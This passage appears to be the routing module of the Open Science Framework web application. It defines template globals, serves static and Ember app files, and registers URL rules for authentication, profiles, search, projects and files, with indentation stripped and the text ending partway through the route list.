user_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path_rounded_corners} for inst in user.affiliated_institutions.all()] if user else []
location = geolite2.reader().get(request.remote_addr) if request.remote_addr else None
if request.host_url != settings.DOMAIN:
try:
inst_id = Institution.objects.get(domains__icontains=request.host, is_deleted=False)._id
request_login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
except Institution.DoesNotExist:
request_login_url = request.url.replace(request.host_url, settings.DOMAIN)
else:
request_login_url = request.url
return {
'private_link_anonymous': is_private_link_anonymous_view(),
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._id if user else '',
'user_locale': user.locale if user and user.locale else '',
'user_timezone': user.timezone if user and user.timezone else '',
'user_url': user.url if user else '',
'user_profile_image': get_profile_image_url(user=user, size=25) if user else '',
'user_email_verifications': user.unconfirmed_email_info if user else [],
'user_api_url': user.api_url if user else '',
'user_entry_point': metrics.get_entry_point(user) if user else '',
'user_institutions': user_institutions if user else None,
'display_name': user.fullname if user else '',
'anon': {
'continent': (location or {}).get('continent', {}).get('code', None),
'country': (location or {}).get('country', {}).get('iso_code', None),
},
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'prev_status': status.pop_previous_status_messages(),
'domain': settings.DOMAIN,
'api_domain': settings.API_DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
'popular_links_node': settings.POPULAR_LINKS_NODE,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_domain': settings.API_DOMAIN,
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'osf_url': settings.INTERNAL_DOMAIN,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(request_login_url),
'sign_up_url': util.web_url_for('auth_register', _absolute=True, next=request_login_url),
'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
'profile_url': cas.get_profile_url(),
'enable_institutions': settings.ENABLE_INSTITUTIONS,
'keen': {
'public': {
'project_id': settings.KEEN['public']['project_id'],
'write_key': settings.KEEN['public']['write_key'],
},
'private': {
'project_id': settings.KEEN['private']['project_id'],
'write_key': settings.KEEN['private']['write_key'],
},
},
'institutional_landing_flag': waffle.flag_is_active(request, features.INSTITUTIONAL_LANDING_FLAG),
'maintenance': maintenance.get_maintenance(),
'recaptcha_site_key': settings.RECAPTCHA_SITE_KEY,
'custom_citations': settings.CUSTOM_CITATIONS,
'osf_support_email': settings.OSF_SUPPORT_EMAIL,
'osf_contact_email': settings.OSF_CONTACT_EMAIL,
'wafflejs_url': '{api_domain}{waffle_url}'.format(api_domain=settings.API_DOMAIN.rstrip('/'), waffle_url=reverse('wafflejs')),
'footer_links': settings.FOOTER_LINKS,
'features': features,
'waffle': waffle,
'csrf_cookie_name': api_settings.CSRF_COOKIE_NAME,
}
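# A minimal sketch of how templates consume these globals; the Mako fragment
# below is illustrative only (endpoint and template names are assumptions):
#
#     <p>Signed in as ${user_full_name}</p>
#     <a href="${web_url_for('dashboard')}">My projects</a>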
def is_private_link_anonymous_view():
# Avoid circular import
from osf.models import PrivateLink
try:
return PrivateLink.objects.filter(key=request.args.get('view_only')).values_list('anonymous', flat=True).get()
except PrivateLink.DoesNotExist:
return False
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
    :param trust: Optional. If ``False``, markup-safe escaping will be enabled.
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
        mimetype='text/plain'
)
def sitemap_file(path):
"""Serves the sitemap/* files."""
if path.endswith('.xml.gz'):
mime = 'application/x-gzip'
elif path.endswith('.xml'):
mime = 'text/xml'
else:
raise HTTPError(http.NOT_FOUND)
return send_from_directory(
settings.STATIC_FOLDER + '/sitemaps/',
path,
mimetype=mime
)
def ember_app(path=None):
"""Serve the contents of the ember application"""
ember_app_folder = None
fp = path or 'index.html'
ember_app = None
for k in EXTERNAL_EMBER_APPS.keys():
if request.path.strip('/').startswith(k):
ember_app = EXTERNAL_EMBER_APPS[k]
break
if not ember_app:
raise HTTPError(http.NOT_FOUND)
if settings.PROXY_EMBER_APPS:
path = request.path[len(ember_app['path']):]
url = urlparse.urljoin(ember_app['server'], path)
resp = requests.get(url, stream=True, timeout=EXTERNAL_EMBER_SERVER_TIMEOUT, headers={'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'})
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
return Response(resp.content, resp.status_code, headers)
ember_app_folder = os.path.abspath(os.path.join(os.getcwd(), ember_app['path']))
if not ember_app_folder:
raise HTTPError(http.NOT_FOUND)
if not os.path.abspath(os.path.join(ember_app_folder, fp)).startswith(ember_app_folder):
# Prevent accessing files outside of the ember build dir
raise HTTPError(http.NOT_FOUND)
if not os.path.isfile(os.path.join(ember_app_folder, fp)):
fp = 'index.html'
return send_from_directory(ember_app_folder, fp)
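# A sketch of the EXTERNAL_EMBER_APPS entry shape this view relies on; the
# 'server' and 'path' keys are read above, but the values here are assumed:
#
#     EXTERNAL_EMBER_APPS = {
#         'preprints': {
#             'server': 'http://localhost:4200/',     # proxy target when PROXY_EMBER_APPS is set
#             'path': './website/static/preprints/',  # built assets served otherwise
#         },
#     }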
def goodbye():
# Redirect to dashboard if logged in
redirect_url = util.web_url_for('index')
if _get_current_user():
return redirect(redirect_url)
else:
return redirect(redirect_url + '?goodbye=true')
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
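    # Reading aid (inferred from the calls in this module, not from framework
    # docs): Rule takes roughly
    #
    #     Rule(routes, methods, view_or_data, renderer, **kwargs)
    #
    # where routes and methods may be a single string or a list of strings.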
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
Rule('/sitemaps/<path>', 'get', sitemap_file, json_renderer),
])
# Ember Applications
if settings.USE_EXTERNAL_EMBER:
# Routes that serve up the Ember application. Hide behind feature flag.
for prefix in EXTERNAL_EMBER_APPS.keys():
process_rules(app, [
Rule(
[
'/<provider>/<guid>/download',
'/<provider>/<guid>/download/',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid_download,
notemplate,
endpoint_suffix='__' + prefix
),
], prefix='/' + prefix)
process_rules(app, [
Rule(
[
'/',
'/<path:path>',
],
'get',
ember_app,
json_renderer,
endpoint_suffix='__' + prefix
),
], prefix='/' + prefix)
if EXTERNAL_EMBER_APPS.get('ember_osf_web'):
process_rules(app, [
Rule(
ember_osf_web_views.routes,
'get',
ember_osf_web_views.use_ember_app,
notemplate
)
])
if 'routes' in EXTERNAL_EMBER_APPS['ember_osf_web']:
for route in EXTERNAL_EMBER_APPS['ember_osf_web']['routes']:
process_rules(app, [
Rule(
[
'/',
'/<path:path>',
],
'get',
ember_osf_web_views.use_ember_app,
notemplate,
endpoint_suffix='__' + route
)
], prefix='/' + route)
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.dashboard,
notemplate
),
Rule(
'/myprojects/',
'get',
website_views.my_projects,
OsfWebRenderer('my_projects.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/help/', 'get', website_views.redirect_help, notemplate),
Rule('/faq/', 'get', website_views.redirect_faq, notemplate),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule(
'/explore/',
'get',
discovery_views.redirect_explore_to_activity,
notemplate
),
Rule(
[
'/messages/',
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
website_views.redirect_to_cos_news,
notemplate
),
Rule(
[
'/rr/',
'/registeredreports/',
'/registeredreport/',
],
'get',
registries_views.registered_reports_landing,
OsfWebRenderer('registered_reports_landing.mako', trust=False)
),
Rule(
'/erpc/',
'get',
closed_challenges_views.erpc_landing_page,
OsfWebRenderer('erpc_landing_page.mako', trust=False)
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/registries/',
'get',
registries_views.registries_landing_page,
OsfWebRenderer('public/pages/registries_landing.mako', trust=False),
),
Rule(
'/reviews/',
'get',
reviews_views.reviews_landing_page,
OsfWebRenderer('public/pages/reviews_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
[
'/api/v1/<campaign>/draft_registrations/',
'/api/v1/draft_registrations/'
],
'get',
registries_views.draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
process_rules(app, [
Rule('/confirmed_emails/', 'put', auth_views.unconfirmed_email_add, json_renderer),
Rule('/confirmed_emails/', 'delete', auth_views.unconfirmed_email_remove, json_renderer)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.redirect_explore_activity_to_activity,
notemplate
),
Rule(
'/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
process_rules(app, [
# confirm email
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
notemplate
),
# confirm email for login through external identity provider
Rule(
'/confirm/external/<uid>/<token>/',
'get',
auth_views.external_login_confirm_email_get,
notemplate
),
# reset password get
Rule(
'/resetpassword/<uid>/<token>/',
'get',
auth_views.reset_password_get,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# reset password post
Rule(
'/resetpassword/<uid>/<token>/',
'post',
auth_views.reset_password_post,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# resend confirmation get
Rule(
'/resend/',
'get',
auth_views.resend_confirmation_get,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# resend confirmation post
Rule(
'/resend/',
'post',
auth_views.resend_confirmation_post,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# oauth user email get
Rule(
'/external-login/email',
'get',
auth_views.external_login_email_get,
OsfWebRenderer('external_login_email.mako', render_mako_string, trust=False)
),
# oauth user email post
Rule(
'/external-login/email',
'post',
auth_views.external_login_email_post,
OsfWebRenderer('external_login_email.mako', render_mako_string, trust=False)
),
# user sign up page
Rule(
'/register/',
'get',
auth_views.auth_register,
OsfWebRenderer('public/register.mako', trust=False)
),
# osf login and campaign login
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
notemplate
),
# create user account via api
Rule(
'/api/v1/register/',
'post',
auth_views.register_user,
json_renderer
),
# osf logout and cas logout
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
# forgot password get
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
# forgot password post
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
notemplate
),
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
notemplate
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
# unregistered user claim account (contributor-ship of a project)
# user will be required to set email and password
# claim token must be present in query parameter
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
# registered user claim account (contributor-ship of a project)
# user will be required to verify password
# claim token must be present in query parameter
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
[
'/project/<pid>/addons/',
'/project/<pid>/node/<nid>/addons/',
],
'get',
project_views.node.node_addons,
OsfWebRenderer('project/addons.mako', trust=False)
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
)
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view_json, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id_json, json_renderer),
# Used by profile.html
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/region/',
'put',
osfstorage_views.update_region,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
'/profile/cancel_request_deactivation/',
'post',
profile_views.cancel_request_deactivation,
json_renderer,
),
Rule(
'/profile/logins/',
'patch',
profile_views.delete_external_identity,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
search_views.search_view,
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
json_renderer
),
Rule(
'/api/v1/user/search/',
'get', search_views.search_contributor,
json_renderer
),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', 'get', website_views.legacy_share_v1_search, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
Rule('/', 'get', website_views.index, OsfWebRenderer('institution.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, notemplate),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
notemplate,
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
notemplate,
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/<guid>/files/<provider>/<path:path>/',
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
'/download/<fid_or_guid>/',
'get',
addon_views.persistent_file_download,
json_renderer,
),
Rule(
[
'/api/v1/<guid>/files/<provider>/<path:path>/',
'/api/v1/project/<pid>/files/<provider>/<path:path>/',
'/api/v1/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
json_renderer
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
            # api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
Rule(
[
'/quickfiles/<fid>/'
],
'get',
addon_views.addon_view_or_download_quickfile,
json_renderer
)
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
                '/project/<pid>/node/<nid>/pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
